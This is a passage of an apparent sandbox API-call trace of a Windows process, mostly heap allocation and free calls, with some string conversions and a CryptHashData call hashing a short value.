[0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0134.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0134.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0134.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0134.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0134.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0134.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0134.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.671] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e08 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0134.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0134.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0134.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0134.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dc8 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0134.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0134.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0134.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0134.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.675] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0134.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0134.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e509f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.678] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0134.678] CryptHashData (hHash=0xa86f50, pbData=0x2e54e08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0134.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0134.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.679] HeapFree (in: 